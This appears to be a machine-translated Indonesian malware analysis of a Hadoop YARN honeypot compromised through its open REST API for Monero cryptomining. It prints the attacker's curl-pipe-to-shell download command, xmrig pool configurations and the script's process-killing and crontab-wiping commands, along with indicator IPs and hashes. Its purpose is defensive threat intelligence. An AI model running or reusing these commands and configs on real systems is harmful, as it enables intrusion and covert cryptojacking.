PEMBERITAHUAN KEPADA PEMBACA: ARTIKEL INI DIMAKSUDKAN UNTUK PROFESIONAL CYBERSECURITY.
JANGAN MEMBUAT LINK YANG DIPUBLIKASIKAN!
Anda tidak menyadari kerumitan subjek tertentu jika tidak ketika Anda berbenturan, dan itu biasanya sudah terlambat.
Untuk mencoba membuat orang memahami apa artinya "dunia maya", beberapa malam terakhir ini saya memakai komputer dan, untuk tujuan pendidikan, saya membuat lingkungan HDFS1 tidak dilindungi untuk memahami apa yang bisa terjadi dalam hal instalasi dan konfigurasi lingkungan tidak benar "Hardened" Saya diperiksa, itu adalah kasus yang paling umum dari instalasi dilakukan oleh tenaga teknis benar atau tidak sangat memperhatikan.
Apa yang akan dilaporkan adalah bagaimana ada masalah keamanan dengan sistem manajemen sumber daya Hadoop Benang (akses tidak sah di API REST2) dengan mana Anda dari jarak jauh dapat mengeksekusi kode arbitrer. Setelah infrastruktur dibuat, saya hanya menunggu perkembangan acara. Setelah seminggu saya menemukan bahwa infrastruktur yang dibuat diserang dan dikompromikan.
Saya kemudian mulai menganalisis salah satu kasus kompromi dan akan memberikan saran dan solusi keamanan untuk mengatasi masalah ini.
Kasus yang dipilih adalah kasus pertambangan di criptocurrency
Untuk memulai, mari kita coba memahami sesuatu tentang infrastruktur yang digunakan sebagai "honeypot3".
Hadoop adalah infrastruktur sistem terdistribusi yang dikembangkan oleh Apache Foundation, platform pengelolaan sumber daya terpadu untuk sistem hadoop, yang peran utamanya adalah untuk mencapai manajemen terpadu dan perencanaan sumber gugus (umumnya digunakan untuk mengelola data seperti spesies dari File System didistribusikan). itu kerangka Penghitungan MapReduce dapat dijalankan sebagai program aplikasi. Di atas adalah sistem YARN, sumber daya dikelola melalui BENANG. Sederhananya, pengguna dapat mengirim program aplikasi spesifik untuk BENANG-BENAR untuk eksekusi yang mungkin termasuk mengeksekusi perintah sistem mereka.
YARN menyediakan API REST, yang terbuka secara default pada port 8088 dan 8090, untuk alasan ini, setiap pengguna, melalui API dapat melakukan pengiriman aktivitas dan operasi lain dalam mode langsung. Jika mereka tidak dikonfigurasi dengan benar, API REST akan dibuka di jaringan publik (misalnya di Internet, jika Anda memutuskan untuk menggunakan kelompok HDFS aktif awan) dan akan memungkinkan akses yang tidak sah ke sistem yang dibuat. Pada akhirnya, karena itu, konfigurasi yang buruk memastikan bahwa setiap penyerang dapat menggunakan infrastruktur untuk menjalankan perintah jarak jauh, untuk melakukan operasi pertambangan4 atau aktivitas jahat lainnya di sistem.
Mengapa kegiatan semacam ini sangat halus?
Karena sulit untuk memasukkan sistem keamanan ke dalam kluster HDFS atau menggunakan sistem untuk mengaktifkan otentikasi Kerberos, mencegah akses anonim (meningkatkan versi), atau memeriksa pemantauan pada mereka, ini karena struktur ini lahir untuk memaksimalkan kinerja sistem yang digunakan untuk menjalankan pertanyaan ed analisis sudah sendiri mahal dari sudut pandang komputasi.
Lewat dari aktivitas jahat yang ditemukan
-
Analisis intrusi
Pada mesin yang digunakan sebagai umpan itu telah diinstal dan dikonfigurasi dalam mode default Hadoop YARN, ini sendiri menyebabkan masalah keamanan akses yang tidak sah ke sistem. L 'pengacau langsung menggunakan REST API yang terbuka di port 8088, setelah a crawler5 secara khusus mengidentifikasi set pintu terbuka pra-dikonfigurasi oleh pemain. Pada titik ini,pengacau dapat mengirim perintah eksekusi untuk mengunduh dan menjalankan skrip6 .sh di server (terlampir 1 seluruh skrip yang ditemukan, cr.sh). lebih Download mereka kemudian akan memulai proses pertambangan.
Seluruh prosesnya relatif sederhana dan terstruktur dengan baik dan Anda dapat melihat dengan membaca skrip yang tidak ada yang tersisa untuk peluang, seperti beberapa pemeriksaan yang dilakukan pada Server Tamu Hadoop.
Perintah yang ditemukan dan dieksekusi menarik:
exec / bin / bash -c "curl 185.222.210.59/cr.sh | s & sangkal"
Saya memikirkan perintah ini untuk menyoroti dua aspek yang sangat penting yaitu alamat IP dari mana script diunduh dan beberapa aktivitas yang berfungsi untuk menutupi aktivitas jahat7.
Jika kita melanjutkan analisis kode dalam skrip crsh, mudah untuk memperhatikan bahwa penulis yang sama telah menaruh perhatian khusus dalam menghilangkan jejak dari aktivitas yang dilakukan.8.
Pada titik ini, secara ringkas, kita dapat mengatakan bahwa keseluruhan naskah sangat rinci dan tampaknya setiap fungsi bersarang dan dipanggil, banyak file terlibat dalam keseluruhan proses, sehingga kami dapat melaporkan langkah-langkah utama sesuai dengan daftar berikut:
-
Bersihkan proses, file dan aktivitas crontab terkait;
-
Juri dan unduh programnya pertambangan, periksa nilai MD5 secara bersamaan, selain server yang dicentang, gunakan juga https: // transfer.sh untuk memberikan Download cadangan;
-
Menambahkan aktivitas eksekusi dari Download dari naskah di crontab.
Indikator utama yang muncul dari analisis adalah sebagai berikut:
-
185.222.210.59;
-
cr.sh
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
-
http:// 185.222.210.59/re.php
-
xmrig_64 atau xmrig_32
Kami akan memeriksa dengan siklus OSINF9 indikator di atas.
-
185.222.210.59
Kami mencoba memverifikasi asal-usul alamat IP ini. Bidang utama berikut ditunjukkan pada gambar di bawah ini:
Di beberapa forum10 produsen / perusahaan untuk merilis platform berdasarkan HDFS, alamat IP dan string yang tepat ditemukan juga dalam skrip kami dilaporkan, meminta penjelasan. Dalam beberapa kasus menanyakan apakah itu konfigurasi standar. Semua berkat beberapa administrator HDFS yang melakukan pemeriksaan tangan dan aperiodik, tidak ada automatisme.
Dengan pergi untuk memeriksa pengoperasian server, Anda mendapatkan yang berikut:
Informasi dasar
|
OS |
Debian |
|
Protokol |
80 / HTTP dan 22 / SSH |
-
80 / HTTP
|
DAPATKAN / |
|
|
Server |
Apache httpd 2.4.10 |
|
Baris Status |
200 OK |
|
Page Title |
Halaman Default Debian Apache2: Ia bekerja |
|
DAPATKAN / |
-
22 / SSH
|
SSHv2 Handshake |
|
|
Server |
OpenSSH 6.7p1 |
|
Spanduk |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Kunci Host |
|
|
Algoritma |
ECDSA-sha2-nistp256 |
|
Sidik jari |
5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40 |
|
Algoritma Negosiasi |
|
|
Pertukaran Kunci |
curve25519- sha256 @ libssh .org |
|
Symmetric Cipher |
aes128-ctr | aes128-ctr |
|
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
Ini juga telah diverifikasi bahwa port 111 terbuka ada yang sesuai dengan layanan portmap. Karena itu dari samping Server terletak portmapper mendengarkan di port 111 (portmapper), dari samping klien ada sejumlah program itu, untuk setiap layanan RPC11, harus terlebih dahulu menghubungi portmapper remote yang menyediakan mereka dengan informasi yang diperlukan untuk membuat koneksi dengan daemon kompeten. Kerentanan yang mungkin dalam layanan juga dapat diverifikasi, tetapi bukan merupakan objek penelitian dan kegiatan analisis.
Jadi Server yang dimaksud adalah "terhubung" dan mungkin dikelola melalui port 22 dengan protokol ssh, yang menjamin koneksi terenkripsi. Dari lapangan 22.ssh.v2.server_host_key.fingerprint_sha256, yaitu dari sidik jari dari ssh server, pencarian menunjukkan bahwa tidak ada yang lain.
Hal ini juga dilaporkan seperti pada 80.http.get.headers.last_modified tanggal Wed ditampilkan, 16 Mei 2018 14: 58: 53 GMT
Il Server milik ketersediaan alamat perusahaan PRISM BUSINESS SERVICES LTD, yang dari situs utama http: // www. prismbusiness.co.uk/about-us/ tampaknya tidak ada hubungannya dengan kegiatan yang berkaitan dengan sektor teknis TIK, tetapi di bidang lain. Jika mereka memiliki server aktif dalam suatu konteks awan, mungkin dikonfigurasi dan / atau dikelola jika diperlukan, mungkin tidak menyadari penggunaannya saat ini.
Seluruh jaringan ketersediaannya ditunjukkan:
Tidak ada resolusi DNS pada IP yang dianalisis.
-
cr.sh
Lo naskah cr.sh yang telah dianalisis memiliki yang berikut MD5 48e79f8de26fa56d955a28c2de493132Namun, tidak ada bukti pengindeksan di internet.
-
MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
MD5 dilaporkan, sesuai dengan file yang diunduh selama pelaksanaan skrip dan ditampilkan dalam tabel di bawah ini:
|
Nama file |
MD5 |
|
xmrig_64 |
c8c1f2da51fbd0aea60e11a81236c9dc |
|
xmrig_32 |
5110222de7330a371c83af67d46c4242 |
File-file yang ditampilkan di atas adalah inti dari eksekusi Bukti Kerja (PoW) dari satu cryptocurrency terkenal, memang Monero.
-
https:// transfer.sh/ixQBE/zzz
Menarik adalah penggunaan transfer.sh, yang ternyata menjadi satu Taktik, Teknik, dan Prosedur (TTPs) dari perilaku ini pengacau, yang memperoleh cadangan untuk mengunduh file yang dapat dieksekusi data mining.
Faktanya, telah ditemukan bahwa transfer.sh tidak lebih dari berbagi file dengan cepat dan mudah dari baris perintah. Kode ini berisi server dengan semua yang Anda butuhkan untuk membuat instance Anda sendiri ", semuanya tersedia untuk diunduh di https: // github.com/dutchcoders/transfer.sh dan di situs web https: // transfer.sh/ di mana terdapat penjelasan penggunaan dengan use case agar dapat dengan mudah mengintegrasikan dan mengkonfigurasinya. Proses dari penggunaan kembali kode saat ini banyak digunakan baik dalam konteks Kejahatan Cyber bahwa konteks jauh lebih luas daripada Spionase Cyber o Cyber Intelligenge.
-
http:// 185.222.210.59/g.php
Halaman hari ini, 02 Juni 2018, merespons dengan alamat IP 95.142.40.81, pada saat ditemukannya naskah alamat IP yang ditampilkan adalah 46.30.42.162. Keduanya memiliki perilaku yang sama, dimasukkan sebagai variabel f1, setelah pemeriksaan yang dilakukan dengan getconf LONG_BIT, xmrig_64 atau xmrig_32 yang dapat dijalankan diunduh. Jelas ini memungkinkan, jika ditemukan alamat IP pertama yang berbahaya, tetapi bukan IP kontrol dan manajemen 185.222.210.59, untuk membuat kontrol keamanan yang tidak diperlukan seperti Blacklist da firewall, pengkategorian non-butuler dari Websense o peringatan SIEM tersedia untuk SOC.
Mari kita lihat apakah kita dapat memperoleh sesuatu dari dua alamat IP:
46.30.42.162
Alamat tersebut menghasilkan ketersediaan VPS Eurobyte, dan pengalamatan tersebut membawa kelas alamat bar 24 dalam ketersediaan Hosting ini, yang berasal dari Rusia.
Ini juga Server, menghasilkan port 22 dan 80 terbuka, dengan Sistem Operasi Debian.
Di bawah ini adalah detail yang ditemukan:
Informasi dasar
|
OS |
Debian |
|
jaringan |
MCHOST - AS (RU) |
|
Rute |
46.30.42.0 / 24 melalui AS7018, AS3356, AS35415, AS48282 |
|
Protokol |
80 / HTTP dan 22 / SSH |
-
80 / HTTP
|
DAPATKAN / |
|
|
Server |
Apache httpd 2.4.10 |
|
Baris Status |
200 OK |
|
Page Title |
Halaman Default Debian Apache2: Ia bekerja |
|
DAPATKAN / |
-
22 / SSH
|
SSHv2 Handshake |
|
|
Server |
OpenSSH 6.7p1 |
|
Spanduk |
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 |
Kunci Host |
|
|
Algoritma |
ECDSA-sha2-nistp256 |
|
Sidik jari |
3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad |
|
Algoritma Negosiasi |
|
|
Pertukaran Kunci |
curve25519- sha256 @ libssh .org |
|
Symmetric Cipher |
aes128-ctr | aes128-ctr |
|
MAC |
hmac-sha2-256 | HMAC-sha2-256 |
Perlu dicatat bahwa pencarian berdasarkan Sidik Jari Kunci Host, menunjukkan bahwa ada server 41 lain dengan tanda tangan yang sama. Dari server 41 ini, bahkan alamat IP 95.142.40.81 baru ada dalam ketersediaan penyusup.
Dengan data ini kita mungkin bisa berasumsi bahwa kita telah menemukannya kolam infrastruktur tingkat pertama dari single ini pengacau atau kelompok Kejahatan Cyber.
Pengalamatan dan informasi apa pun yang berguna untuk kegiatan selanjutnya dilaporkan:
|
95.142.40.74 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.249 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.89 (vz229526.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.190 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.189 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.47.115 (vz227413.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.39.241 (shimshim.info) |
AS (48282) Rusia location.country: Rusia database mysql |
|
95.142.40.188 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.41.207 (vz230806.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.41.182 (vz230501.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.39.251 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.67 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.65 (profshinservice.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.45.91 (vz220153.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.46 (server.badstudio.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.41.80 (track.dev) |
AS (48282) Rusia location.country: Rusia |
|
46.30.45.152 (vz230274.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.72 (vz231895.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.137 (vz224405.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.39.151 (donotopen.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
185.154.52.117 (vz230686.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.47.157 (vz228859.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.83 (vz228857.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.86 (kolos1952.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
95.142.40.81 (vz228855.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.42.162 (server.com) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.82 (vz228856.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.43.128 (vz228757.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.52.236 (supportt.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
95.142.39.109 (vz228627.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.40.44 (vz229990.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
95.142.39.164 (vz232259.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
46.30.45.30 (shop.engine) |
AS (48282) Rusia location.country: Rusia |
|
95.142.39.172 (hosted-by.wikhost.com) |
AS (48282) Rusia location.country: Rusia database mysql |
|
185.154.52.161 (piar60.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
95.142.40.87 (regiister.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
95.142.40.88 (buled.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
185.154.53.190 (vz228963.eurodir.ru) |
AS (48282) Rusia location.country: Rusia database mysql |
|
46.30.41.51 (vz225213.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.53.108 (vz224405.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
|
185.154.52.181 (vz224405.eurodir.ru) |
AS (48282) Rusia location.country: Rusia |
Ini bukan metadata mengenai analisis IP 41 di atas:
Semua alamat yang ditemukan, lihat AS MCHOST-AS, RU:
1-th Street Frezernaiy, 2 / 1 XENUMX sapuan
109202 Moscow
FEDERASI RUSIA
telepon: + 7 495 6738456
fax: + 7 495 6738456
e-mail: info (at) mchost (dot) ru
Wilayah yang dilayani: RU
-
http:// 185.222.210.59/w.conf
hari ini:
{
"Algo": "cryptonight",
"latar belakang": benar,
"colors": salah,
"mencoba lagi": 5,
"coba lagi-jeda": 5,
"donasi tingkat": 1,
"syslog": salah,
"log-file": null,
"waktu cetak": 60,
"av": 0,
"Aman": salah,
"max-cpu-usage": 95,
"cpu-priority": 4,
"utas": null,
"pools": [
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"pengguna": "h",
"lulus": "h",
"keepalive": benar,
"nicehash": salah,
"varian": -1
}
],
"api": {
"port": 0,
"akses-token": null,
"pekerja-id": null
}
}
Pada saat ditemukannya naskah:
{
"Algo": "cryptonight",
"latar belakang": benar,
"colors": salah,
"mencoba lagi": 5,
"coba lagi-jeda": 5,
"donasi tingkat": 1,
"syslog": salah,
"log-file": null,
"waktu cetak": 60,
"av": 0,
"Aman": salah,
"max-cpu-usage": 95,
"cpu-priority": 4,
"utas": null,
"pools": [
{
"url": "stratum + tcp: // 179.60.146.10: 5556",
"pengguna": "h",
"lulus": "h",
"keepalive": benar,
"nicehash": salah,
"varian": -1
},
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"pengguna": "h",
"lulus": "h",
"keepalive": benar,
"nicehash": salah,
"varian": -1
}
],
"api": {
"port": 0,
"akses-token": null,
"pekerja-id": null
}
}
Penting untuk menggarisbawahi bagaimana file conf mendefinisikan dua indikator penting untuk fase analisis (kami juga dapat mendefinisikan tiga):
-
stratum + tcp: // 46.30.43.159: 80 (umum pada tanggal yang berbeda);
-
stratum + tcp: // 179.60.146.10: 5556 (hanya pada pencarian pertama);
-
"Algo": "cryptonight";
Mari kita menganalisis IP pertama secara umum 46.30.43.159. Alamat IP ini, dalam ketersediaan Eurobyte VPS, Rusia, memiliki PTR vz230703.eurodir.ru dan merupakan bagian dari net 46.30.43.0 / 24. PTR dari IP dari bersih, terlampir 1 menunjukkan seluruh kelas, mereka memiliki sesuatu yang istimewa. Saya melaporkan dalam tabel di bawah PTR dengan kesamaan tanpa bidang A, Saya 41:
|
IP |
PTR |
|
46.30.43.13 |
vz94180.eurodir.ru |
|
46.30.43.17 |
vz203045.eurodir.ru |
|
46.30.43.21 |
vz206109.eurodir.ru |
|
46.30.43.23 |
vz216100.eurodir.ru |
|
46.30.43.24 |
vz174272.eurodir.ru |
|
46.30.43.30 |
vz35015.eurodir.ru |
|
46.30.43.57 |
vz78210.eurodir.ru |
|
46.30.43.58 |
vz229754.eurodir.ru |
|
46.30.43.61 |
vz35015.eurodir.ru |
|
46.30.43.64 |
vz38207.eurodir.ru |
|
46.30.43.66 |
vz86195.eurodir.ru |
|
46.30.43.70 |
vz173527.eurodir.ru |
|
46.30.43.77 |
vz174931.eurodir.ru |
|
46.30.43.79 |
vz195563.eurodir.ru |
|
46.30.43.82 |
vz197086.eurodir.ru |
|
46.30.43.90 |
vz120816.eurodir.ru |
|
46.30.43.93 |
vz173527.eurodir.ru |
|
46.30.43.98 |
vz94065.eurodir.ru |
|
46.30.43.101 |
vz216360.eurodir.ru |
|
46.30.43.102 |
vz195005.eurodir.ru |
|
46.30.43.123 |
vz212299.eurodir.ru |
|
46.30.43.128 |
vz228757.eurodir.ru |
|
46.30.43.130 |
vz168899.eurodir.ru |
|
46.30.43.156 |
vz195735.eurodir.ru |
|
46.30.43.159 |
vz230703.eurodir.ru |
|
46.30.43.161 |
vz171964.eurodir.ru |
|
46.30.43.166 |
vz123353.eurodir.ru |
|
46.30.43.170 |
vz224733.eurodir.ru |
|
46.30.43.172 |
vz226924.eurodir.ru |
|
46.30.43.184 |
vz171966.eurodir.ru |
|
46.30.43.186 |
vz162078.eurodir.ru |
|
46.30.43.214 |
vz207073.eurodir.ru |
|
46.30.43.219 |
vz110518.eurodir.ru |
|
46.30.43.224 |
vz98980.eurodir.ru |
|
46.30.43.226 |
vz100250.eurodir.ru |
|
46.30.43.229 |
vz110562.eurodir.ru |
|
46.30.43.232 |
vz228251.eurodir.ru |
|
46.30.43.237 |
vz162078.eurodir.ru |
|
46.30.43.244 |
vz207073.eurodir.ru |
|
46.30.43.245 |
vz174272.eurodir.ru |
|
46.30.43.246 |
vz157495.eurodir.ru |
Juga dalam hal ini, manajer mungkin tidak menyadari bahwa beberapa server di bawah ketersediaannya, digunakan untuk tujuan pihak ketiga, namun harus dianalisis satu per satu, untuk menemukan kesamaan lebih lanjut.
Menganalisis 179.60.146.10sebaliknya kita memiliki yang berikut:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
Port 22, 111, hasil 5555 Buka dan ini juga Server menggunakan OpenSSHVersion: 6.7p1 Debian 5 + deb8u3
Sayangnya tidak ada bukti lain.
Cryptonight sebaliknya, ini adalah indikator kuat dari apa yang ingin Anda lakukan, begitu Anda menekan target. Secara khusus, tujuannya adalah untuk meruntuhkan blok dari cryptocurrency dari Monero, memasuki target dalam kolam tersedia dell'intruder. Pilihannya tidak acak. Protokolnya Cryptonight Ini telah dipelajari untuk diadopsi oleh buruh tambang yang tidak memiliki ketersediaan ASIC atau kluster kartu grafis yang sangat mahal, tetapi Anda dapat menggunakan CPU klasik PC, Notebook atau MiniPC.
Memang, CryptoNight digunakan untuk pertambangan dari koin-koin yang ditandai dengan protokol CryptoNote. Ini adalah fungsi yang terikat secara ketat ke memori (memori hash keras), dalam hal ini ke memori cache level ketiga dari CPU karena fokus pada latensi. Kendala ini diberlakukan untuk membuat CryptoNight tidak efisien pada sistem seperti GPU dan FPGA, tidak dilengkapi dengan memori cache dan karena itu dirugikan penggunaan algoritma.
Dimensi dari papan penggaris yang CryptoNight sekitar 2 MB memori untuk setiap contoh karena alasan berikut:
-
itu dapat terkandung dalam cache L3 (per inti) dari prosesor modern;
-
memori internal a megabyte è sebuah ukuran yang tidak dapat diterima untuk pipa ASIC tradisional;
-
GPU dapat menjalankan ratusan benang tetapi mereka memiliki latensi yang jauh lebih buruk daripada cache L3 dari CPU modern;
-
ekspansi signifikan dari papan penggaris akan membutuhkan peningkatan interaksi. Jika node menghabiskan banyak waktu pada hash blok, itu bisa dengan mudah dibanjiri dengan mekanisme banjir blok palsu yang menyebabkan DDoS.
Meningkatkan
Hanya pada hari-hari ini, telah ada modifikasi dari naskah cr.sh, dari file-file konfigurasi dan executable.
Pengunduhan yang dapat dijalankan untuk tanggal pertambangan itu diperoleh dari alamat IP 95.142.40.83, yang menyebabkan identifikasi melalui sidik jari dari kunci ssh, tambahan alamat IP tersedia untukpengacau.
Tabel di bawah ini menunjukkan rincian 20 pada alamat IP 65, karena Anda tidak memiliki kemungkinan untuk mendapatkan semuanya dalam jumlah besar (waktu kelangkaan dan rekening dibayar tidak tersedia) dengan kunci yang sama ssh dan konfigurasi yang sama.
|
95.142.39.233 vz231616.eurodir.ru |
McHost.Ru Ditambahkan pada 2018-06-03 03: 44: 26 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.43.128 vz228757.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-03 03: 35: 03 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.47.107 vz227413.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-03 03: 15: 02 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.41.182 vz230501.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-02 21: 01: 28 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.47.21 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Ditambahkan pada 2018-06-02 16: 48: 39 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.40.188 vz232259.eurodir.ru |
McHost.Ru Ditambahkan pada 2018-06-02 12: 58: 55 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.45.30 shop.engine |
EuroByte LLC Ditambahkan pada 2018-06-02 09: 45: 16 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.40.81 vz228855.eurodir.ru |
McHost.Ru Ditambahkan pada 2018-06-02 07: 11: 32 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
185.154.53.137 vz224405.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-02 07: 04: 48 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.47.82 vz227413.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-02 04: 55: 14 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
185.154.53.67 vz232259.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-02 03: 45: 39 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.40.87 regiister.ru |
McHost.Ru Ditambahkan pada 2018-06-01 22: 04: 23 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.47.66 vz227407.eurodir.ru |
EuroByte LLC Ditambahkan pada 2018-06-01 18: 17: 26 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
185.154.52.236 supportt.ru |
EuroByte LLC Ditambahkan pada 2018-06-01 11: 27: 17 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.47.35 vz227411.eurodir.ru |
Linux 3.x EuroByte LLC Ditambahkan pada 2018-06-01 11: 07: 16 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
185.154.53.46 server.badstudio.ru |
EuroByte LLC Ditambahkan pada 2018-06-01 07: 22: 23 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.40.89 vz229526.eurodir.ru |
McHost.Ru Ditambahkan pada 2018-05-31 14: 07: 45 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
46.30.42.162 server.com |
EuroByte LLC Ditambahkan pada 2018-05-31 12: 56: 26 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.39.102 vz222177.eurodir.ru |
McHost.Ru Ditambahkan pada 2018-05-31 10: 05: 30 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
|
95.142.40.86 kolos1952.ru |
McHost.Ru Ditambahkan pada 2018-05-31 09: 42: 31 GMT Federasi Rusia SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 Jenis kunci: ssh-rsa |
Berikut ini beberapa grafik mendetail:
Selain itu, file yang dapat didownload ditampilkan sebagai berikut:
|
Nama file |
MD5 |
|
xm64 |
183664ceb9c4d7179d5345249f1ee0c4 |
|
xm32 |
b00f4bbd82d2f5ec7c8152625684f853 |
Selain di atas, di naskah, perintah berikut ini hadir:
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf / tmp / pscd *
rm -rf / var / tmp / pscd *
crontab-l | sed '/ 192.99.142.232 / d' | crontab -
crontab-l | sed '/ 192.99.142.226 / d' | crontab -
crontab-l | sed '/ 192.99.142.248 / d' | crontab -
crontab-l | sed '/ logo4 / d' | crontab -
crontab-l | sed '/ logo9 / d' | crontab -
crontab-l | sed '/ logo0 / d' | crontab -
Penggunaan perintah sed, yang tidak sering dalam pemrograman, segera terbukti, oleh karena itu juga bisa berakhir di antara TTP yang digunakan oleh aktor bermusuhan.
Sed adalah satu aliran editor, digunakan untuk melakukan transformasi teks pada aliran input (file atau masukan dari saluran pipa); kemampuan sed untuk menyaring teks dalam saluran pipa yang membedakannya dengan cara tertentu dari jenis editor lain.
Dalam konteks ini digunakan untuk menghilangkan jejak dari aktivitas cron. Mungkin, ada aktivitas intrusi yang tidak diketahui oleh analisis, karena mereka berasal dari aktivitas masa lalu yang kemudian diubah untuk mendapatkan apa yang diharapkan.
Melakukan analisis alamat IP 192.99.142.232, 192.99.142.226, 192.99.142.248, kami memperoleh bahwa perusahaan (ISP) referensi adalah OVH Hosting dengan lokasi di Kanada.
Semua memiliki konektivitas port 22, ssh. Namun jika mereka dianggap sebagai alamat IP jahat, misalnya mengacu pada apa yang dilaporkan di tautan https://www. joesandbox.com/index.php/analysis/49178/0/executive, di mana penggunaan PowerShell diumumkan, memperkaya pencarian kami memverifikasi bahwa alamat IP 192.99.142.232 memiliki sidik jari yang sama dengan IP 85.214.102.143 yang terletak di Jerman di ketersediaan ISP Strato AG. Namun, alamat tersebut memiliki sertifikat 443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b yang juga mengikatnya ke IP berikut: 85.214.125.15 (emma.smartmessaging.com) Debian OS meter, dan ke IP 85.214.60.153. busware.de) OS Debian.
|
Dari |
Ke Ss Sidik Jari |
Tls sidik jari |
|
192.99.142.232 |
85.214.102.143 |
85.214.125.15 |
|
85.214.60.153 |
